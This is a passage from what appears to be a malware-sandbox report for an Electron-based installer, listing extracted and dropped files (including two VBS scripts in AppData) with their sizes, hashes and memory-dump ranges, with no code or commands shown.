91379a583d22fa9343ed466c261366ff

SHA1
61e8c39235945c4f38807b14ac74da7d3257759a

SHA256
0d4d0b8052519848abd182c44dfbf444a77a0c6994965c4a3001f0a3a4d1459e

SHA512
dde26b59a1e5f94d5b245f47399d7a9d3db8d247037331a471c39b1d7e79e236c5a0732fea4c53b843d8eaff1f54ca155a816a193b7baa870fc458a5aadf76be

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\locales\sk.pak

Filesize
502KB

MD5
78bc785a75ee512391a9cb462a771c09

SHA1
229d39e017174dc0a8cefcfcc72b0feca94d6208

SHA256
ec15c82956ebddb7b246c78045ad414ed34ca97d890a915070e252c8715096b0

SHA512
96556f6072e69351e1bbce06bbf896b1ad53060c7cbaf7928eebbe0f610f5e8778b2b8b97a5a268b7942a1c8d1adc6bea0403383a2a5bb99049437e95d575ea0

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\locales\sl.pak

Filesize
483KB

MD5
e76e473c419c25768b08a95a2822918f

SHA1
0fa7e2fcabb03a8788f50f1d4b4eb383c833e9ba

SHA256
fcd27a9f5cb4b4be373da7076a8232006ebe020999fdf90d20745f16cd7ef223

SHA512
e39ae0acbb7d148d6ade676d92e83fa9fb433230bae4339c31693a538198bf0679adef51883b96f8dfbcc8593a982544c64a2b265897f35a693183b27070ea5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\locales\sr.pak

Filesize
745KB

MD5
48abf758a49e2e8aab013f2bf56091c0

SHA1
ca909bc28b03bf959ac32e218a318289e0badbf0

SHA256
b4cf2d19b5e443b57ca9d1189880458a7cacfe1c8b231265557a3fb58f597617

SHA512
22d65df1cd35a8127296420a699f26edf55813fd6a970050dc9b2b051aaf7da2cf2fe6314a94977587021c02aa7d8b42541e1d08d5940fb7e1af127e87268c68

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\locales\sv.pak

Filesize
433KB

MD5
06c878c1538813e5938d087770058b44

SHA1
c8ab9b516b8470bdee86483151ae76368646bffc

SHA256
90dc45426bc1302aa05261f136881ddf038272e9ac315297aa8e5dae2b31109b

SHA512
6ddf615bcf0a8c62221233687bae1eeda5cfd749aa8acc179d6650987289201b405edd453fc181a1d250eba9bbdf61ea28fb7c694539fae3d320bfdea56665cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\locales\sw.pak

Filesize
456KB

MD5
55241312a3aaba14a6b19a9012ca25b8

SHA1
69fadf0817faec3bc6b018f0af5f63378ade0939

SHA256
722c86bd857a93ae06ca0b7cfe2cc04237a7ed5a52586cab7246336c802abe37

SHA512
612f815c25e9f593d1f1c4de8e9016dce048cfe90f21319c4cdbb5772580cb8c71229e9ddba60852cd0bec80a07a783ace24f873d90dc3323e5fdcc44905f2c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\locales\ta.pak

Filesize
1.2MB

MD5
2c0a9cc4a7c775ff13a6888234265cab

SHA1
497bde42737667fc833bbb9d8a9edaf014d99957

SHA256
1dd55659ef21082b9d58bed50f387c0e1fc0f28d0ede52251b9ada25ed2a657f

SHA512
b862221cf17d3f2ca0495a8a3e1f630ab915fd9b2a46ac16c71deffee9a6f71264a8550233781474d60cc6001a48c7c658c77d4e0dbd5b543e768928119d2f0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\locales\te.pak

Filesize
1.1MB

MD5
5f9b7a945638b88e75a3175a7923119d

SHA1
6af614f2cbd72da2224f48a203a6430a623fc7ed

SHA256
3b476d2ce7c72c3a10170808020dc3f1a87309f9f725b08217c4716b28d10888

SHA512
3b66c9152ec032d6f2372ae5075cbfe7d0fb398c4bf173a7f8c76d91d9eaa816e6f839b90884533b46a9224e9fb52c4d439b3d1907885b8e9f80c5c55a852b65

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\locales\th.pak

Filesize
918KB

MD5
84ad3f888c0ec307bb7b8c278cd36757

SHA1
948a5f8b43d059280d5374ca6d66e8dfc6a76d49

SHA256
56665860fe6577fbe00543a47a15e10eceae83458815f2989d179e42af07f81b

SHA512
7001c0607df927145e40a605e2b97914d02712d11e09ca20339cb1aefb042a1f853fd06e78b76f6dc6f19b6df837bca12946a3470c6c064ca767af1db57042e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\locales\tr.pak

Filesize
465KB

MD5
0aedf5c2f6f4f49074a2adea454df4c9

SHA1
a48d9d8461e61170257897766dbd6906e754a0c3

SHA256
3f4658b3811b36f5cad794e48e6507335abfe78b0bfa0c80d1ef9c5d7bb410d0

SHA512
e359e446330fc154c16e34a7335174f372bce701faf85de8a5f4b432ce3e10c69f42c93b7182deac89bb4d29750d0dd525b6dcd74a5b7bd724f544d14ba44a79

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\locales\uk.pak

Filesize
798KB

MD5
64aa9344abd9a32f10d6c05a58eda4eb

SHA1
3286ee43f36e2232677b4573e8b4a3303c7df048

SHA256
ca20af5982ae706f5029467901d7d66f90b261f03c7d240d0d1ab2fca2b50a7b

SHA512
dd768b314da50b8ba5a006a4e56d70044c1af79960834722894d930f5347194ae7f9f5697bc4cd0790a79341635cb1df8c74ff45f74d1736049161af5b163efb

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\locales\ur.pak

Filesize
696KB

MD5
88eef2798dee8a361c3ea9bafaa02a35

SHA1
6f8d4ce422336ca5048ef35d6ece360a9b416d8a

SHA256
91318006c880e427417a2b2fff81fd451769a5536fa16d1dc185972137bc2d6a

SHA512
db36b58186f165ff3f746ac483f75b6fed596fad9b3f335e86b374b359e563407acf58ac7cded9420e4fcb91f31eebc8a91c7777ea59bafced8cff2f1c0e9a53

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\locales\vi.pak

Filesize
551KB

MD5
4c5c09cb7e6eb120c8019fe94e1ac716

SHA1
f018e7f095605e21db24944b828cc3580cba863f

SHA256
e7319ca18eba379772954132493bbabb448d4e97d755b85360ed337216b48800

SHA512
d171ee83cf02a8904290a74df1224556887e41333b8a01fbd95f0cacc88d230195fbfb6f99f9e02573d4864b3c95b570a77c2a0b1e19324d2599925e40684807

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\locales\zh-CN.pak

Filesize
398KB

MD5
07b6c43d87dbf93ac8abe6837f3c2103

SHA1
79e033179b445609b3f1756c3f4184d5efacf1c2

SHA256
7f85b35938fadca91bfd8f92ca53613718e375ef010c340947dd27a4ff66594c

SHA512
38ef8f8a8a950b11c18eb7a40da721b888ef792a49e1371dc8c1eb22058a6791f95bf9b25df4ba190a7aa6cb62ce38b0bfaea83c71b62cde6980d12cf9da53f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\locales\zh-TW.pak

Filesize
394KB

MD5
960e99a171c4ed4b6d787027ba88774d

SHA1
e3869aff0c52841c9df718133e7c4be2977de7fb

SHA256
e42640f5309add2ea7fd5a4db503b93e479ef14807710a06d7e53a0f261da8e6

SHA512
4e51d787aff8f425d101882bd70e71b88b253f2ca61ed54dd7ff77c7e3a1d6570b270f4eb91f2d03869ea4537d09e141f3e32ea3a27537295ec698bf26305cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\resources.pak

Filesize
5.2MB

MD5
6e1fad905fa7f5f18dd5ce2fb95fb502

SHA1
215869f0ec522461305573d9656129c53c2373fd

SHA256
6f7b84f43e96c3e4681d998eb46e5adb5e04005d46d480400dc9314d4a253c43

SHA512
3cce71cdb801f06ae885fe65736f4c9424f4d5d527ca80d5149100f1815df0ea52bcae9e7ce06e5dd6cf67a5214b264ab806fbe770798ccefb2984ed2cba4235

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\resources\app.asar

Filesize
139.4MB

MD5
ee4a1c117921ccf9edb73ea4f0fcf5ef

SHA1
ae60fe9f693520c6854a6638f1396501f3120f55

SHA256
8acd5d7ca0c973cb87975bfe519a743fc1f2ee67a4dbd40ff57964cd9c878cbd

SHA512
cfaf4f3e076a9989c52c858bef53f17dcd8f6e5ab8502837290710747d590e204e63730aed1e748d5ea1d77e51bd61b115707b9021a248798bdb05d3c26b75d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\resources\elevate.exe

Filesize
105KB

MD5
792b92c8ad13c46f27c7ced0810694df

SHA1
d8d449b92de20a57df722df46435ba4553ecc802

SHA256
9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37

SHA512
6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\snapshot_blob.bin

Filesize
262KB

MD5
40a3c2200e4126e8c47a7802532c9236

SHA1
212a4686dea5a467b7b6fa54397e42122b235f1e

SHA256
94aa518fc892ee9a0f1eb5fe35b60123ee61a5f848864b00519b96d8d5d9786d

SHA512
fa1a943822abe3737587d520654078117cae86c58fefe6dd6a09f4a08c09293e9547a0ad79c52f8638dfbb1c496df3d0e828ce414176c8fbb77113be41212866

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\v8_context_snapshot.bin

Filesize
581KB

MD5
264e3b574e4f86b1fc47b2427402e779

SHA1
4a4f9e7c3da262713e4cf7af6ac51822c56b5ef3

SHA256
ed559c6e81b6003b2057e5c1b0bdb5b28ca094b895ca86c69fe11c5c9e014f06

SHA512
144365d0fb83576aaa02ea6ecea51d7ba2cacb044eea568a08f65b98a83d3e7d7e693738e065e22f94bfd1165d0ea93a749dd1325d829257a9bb6607a9a927db

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\vk_swiftshader.dll

Filesize
4.9MB

MD5
679a2f8dd4d760acbb9ea11042b34f4c

SHA1
d9622a11e078168a51b60edc39fd1bd5aab81587

SHA256
2bc9336e1abd50984a2d5a144bc6360119a0250f73658555c3c6d2d71ac3087b

SHA512
959c0c5b8a24dacaf8a69dd14e09a039e6e0762684c0021032dca3962344fe3f382800f72f3ebdca0e3a7c8a226d57df515a80c9d3d8c2733522c5ed1df5ca36

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\vk_swiftshader_icd.json

Filesize
106B

MD5
8642dd3a87e2de6e991fae08458e302b

SHA1
9c06735c31cec00600fd763a92f8112d085bd12a

SHA256
32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9

SHA512
f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\7z-out\vulkan-1.dll

Filesize
917KB

MD5
efec2cf9ea038da005cbf1f1887a8207

SHA1
a64f9d2da2c480eccbee21ab6a6401770a965dfd

SHA256
2006ce9d935cf037bb9b8332cd74016c88c96cc727c2e9337eaeea91f8aee5a7

SHA512
ab0d15c34154f0813c993b707871d8e1881975c17c5a2eab3f0ea6492dc9f7eef621786c399d6d7bdaaff91cd09ef6520d6d42d773787ef8dc75c2d9a75b372d

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\StdUtils.dll

Filesize
100KB

MD5
c6a6e03f77c313b267498515488c5740

SHA1
3d49fc2784b9450962ed6b82b46e9c3c957d7c15

SHA256
b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e

SHA512
9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\System.dll

Filesize
12KB

MD5
0d7ad4f45dc6f5aa87f606d0331c6901

SHA1
48df0911f0484cbe2a8cdd5362140b63c41ee457

SHA256
3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca

SHA512
c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsx9A5C.tmp\nsis7z.dll

Filesize
424KB

MD5
80e44ce4895304c6a3a831310fbf8cd0

SHA1
36bd49ae21c460be5753a904b4501f1abca53508

SHA256
b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592

SHA512
c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_Daksa2.vbs

Filesize
4KB

MD5
88d57370b47ee4243fdf21edb31ab9d3

SHA1
8e6a9894363c452b500e72f12ec1cb6780ca12e9

SHA256
9f30fca1d947a0e5acdf40d0abe0251b1060e43a02f4bb0bcf3ce5f4e3e94d0d

SHA512
ca87993809f7d1953e3d012a34b6ac7c83071f7b64fc288894a6728e64475339cffd95ab6c52fb1dcd654b789efe9c899662aa920a3652a1f60d769fc223ff42

Download Submit
C:\Users\Admin\AppData\Roaming\b78fKOMNNmuA.vbs

Filesize
130B

MD5
d1111fbbaef28413de4a0a64e0d54f2d

SHA1
5bbadc5c5d504dcba5509d34986125e8446e3830

SHA256
beed3a3f6edc1e1b73a3cafa55f16ba61d56c87b7506ae9c33eb630bcbaa3a01

SHA512
1196efb8579efc91105000afaac0b6c14f386aa29a64ddd88f9a2d6a980bd2eb8dd6a2e78457eb9e5614f9492d0e75342f01293c1a8341b153357f2d64c64af0

Download Submit
memory/2752-906-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/2752-907-0x000001F2E12A0000-0x000001F2E12B0000-memory.dmp

Filesize
64KB

Download
memory/2752-927-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/4144-960-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/4144-931-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/4144-932-0x0000019932320000-0x0000019932330000-memory.dmp

Filesize
64KB

Download
memory/4144-933-0x0000019932320000-0x0000019932330000-memory.dmp

Filesize
64KB

Download
memory/4144-946-0x0000019932320000-0x0000019932330000-memory.dmp

Filesize
64KB

Download
memory/4144-953-0x0000019932320000-0x0000019932330000-memory.dmp

Filesize
64KB

Download
memory/4552-852-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/4552-756-0x00000173438C0000-0x00000173438D0000-memory.dmp

Filesize
64KB

Download
memory/4552-755-0x00000173438C0000-0x00000173438D0000-memory.dmp

Filesize
64KB

Download
memory/4552-754-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/4552-813-0x00000173438C0000-0x00000173438D0000-memory.dmp

Filesize
64KB

Download
memory/4832-590-0x0000019FF7DA0000-0x0000019FF7DB0000-memory.dmp

Filesize
64KB

Download
memory/4832-589-0x0000019FF7DA0000-0x0000019FF7DB0000-memory.dmp

Filesize
64KB

Download
memory/4832-588-0x0000019FF7DA0000-0x0000019FF7DB0000-memory.dmp

Filesize
64KB

Download
memory/4832-594-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/4832-577-0x0000019FF7D00000-0x0000019FF7D22000-memory.dmp

Filesize
136KB

Download
memory/4832-587-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/5556-597-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/5556-598-0x0000024A6CBD0000-0x0000024A6CBE0000-memory.dmp

Filesize
64KB

Download
memory/5556-599-0x0000024A6CBD0000-0x0000024A6CBE0000-memory.dmp

Filesize
64KB

Download
memory/5556-612-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/5868-947-0x0000027AB8570000-0x0000027AB8571000-memory.dmp

Filesize
4KB

Download
memory/5868-955-0x0000027AB8570000-0x0000027AB8571000-memory.dmp

Filesize
4KB

Download
memory/5868-958-0x0000027AB8570000-0x0000027AB8571000-memory.dmp

Filesize
4KB

Download
memory/5868-957-0x0000027AB8570000-0x0000027AB8571000-memory.dmp

Filesize
4KB

Download
memory/5868-956-0x0000027AB8570000-0x0000027AB8571000-memory.dmp

Filesize
4KB

Download
memory/5868-954-0x0000027AB8570000-0x0000027AB8571000-memory.dmp

Filesize
4KB

Download
memory/5868-952-0x0000027AB8570000-0x0000027AB8571000-memory.dmp

Filesize
4KB

Download
memory/5868-951-0x0000027AB8570000-0x0000027AB8571000-memory.dmp

Filesize
4KB

Download
memory/5868-945-0x0000027AB8570000-0x0000027AB8571000-memory.dmp

Filesize
4KB

Download
memory/5868-934-0x0000027AB8570000-0x0000027AB8571000-memory.dmp

Filesize
4KB

Download
memory/7196-900-0x000002B41BE70000-0x000002B41BE80000-memory.dmp

Filesize
64KB

Download
memory/7196-923-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/7196-899-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/7380-856-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/7380-762-0x00000250DC3C0000-0x00000250DC3D0000-memory.dmp

Filesize
64KB

Download
memory/7380-761-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/7380-836-0x00000250DC3C0000-0x00000250DC3D0000-memory.dmp

Filesize
64KB

Download
memory/9124-853-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/9124-760-0x000002CD2CF90000-0x000002CD2CFA0000-memory.dmp

Filesize
64KB

Download
memory/9124-758-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/9124-759-0x000002CD2CF90000-0x000002CD2CFA0000-memory.dmp

Filesize
64KB

Download
memory/9124-833-0x000002CD2CF90000-0x000002CD2CFA0000-memory.dmp

Filesize
64KB

Download
memory/11320-859-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/11320-834-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/11320-835-0x00000250FD510000-0x00000250FD520000-memory.dmp

Filesize
64KB

Download
memory/11320-847-0x00000250FD510000-0x00000250FD520000-memory.dmp

Filesize
64KB

Download
memory/11588-961-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/11588-962-0x0000018E04E90000-0x0000018E04EA0000-memory.dmp

Filesize
64KB

Download
memory/11588-963-0x0000018E04E90000-0x0000018E04EA0000-memory.dmp

Filesize
64KB

Download
memory/11836-862-0x00000247B69B0000-0x00000247B69C0000-memory.dmp

Filesize
64KB

Download
memory/11836-861-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download
memory/11836-863-0x00000247B69B0000-0x00000247B69C0000-memory.dmp

Filesize
64KB

Download
memory/11836-875-0x00007FFB23620000-0x00007FFB240E1000-memory.dmp

Filesize
10.8MB

Download